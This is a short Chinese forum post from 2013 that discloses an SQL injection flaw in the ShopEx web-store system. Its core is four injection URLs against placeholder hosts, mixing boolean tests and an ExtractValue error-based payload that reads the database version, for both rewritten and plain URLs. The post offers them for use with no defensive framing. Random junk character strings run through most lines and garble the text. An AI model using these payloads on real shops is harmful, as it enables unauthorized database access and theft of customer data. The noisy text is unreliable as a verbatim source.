注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…: F0 z# N, e7 D6 U, V& I% W9 e
h1 O1 j2 H7 ?7 J好吧,我扯远了~~
* t: f$ @: q8 J# x, A. _$ g2 F- H, k其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~, t0 Z5 m, D1 K( h* }4 }
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:! F- |5 S3 p, Y4 e
9 E+ o1 k! z$ o4 Z; s
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
$ E. V/ {, \* y
1 J6 ^6 G% p# @& shttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html9 |- t7 n' ]0 k( D
& o+ g3 p0 ~/ m* T8 o4 x4 P
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html6 V* X4 E* `, I v2 G5 r5 m
- S, {8 `- X! k+ g! [ w. @. m* e
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html- y B1 L- Z' m1 ^6 p" {' x- J! C
6 _7 a1 `1 w, L4 @/ E* u1 v% r5 L
, F6 F3 F; J8 Z$ Q! }' t
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
; `: C; z- K1 A% w$ c如何注入就不多说了,10多年的东西了…不会也会了…) i. l9 M" M) p8 ^: p
# M, Y: U. Q- ?6 W3 N
|
发表于 2013-2-4 16:20:04
收藏
支持
反对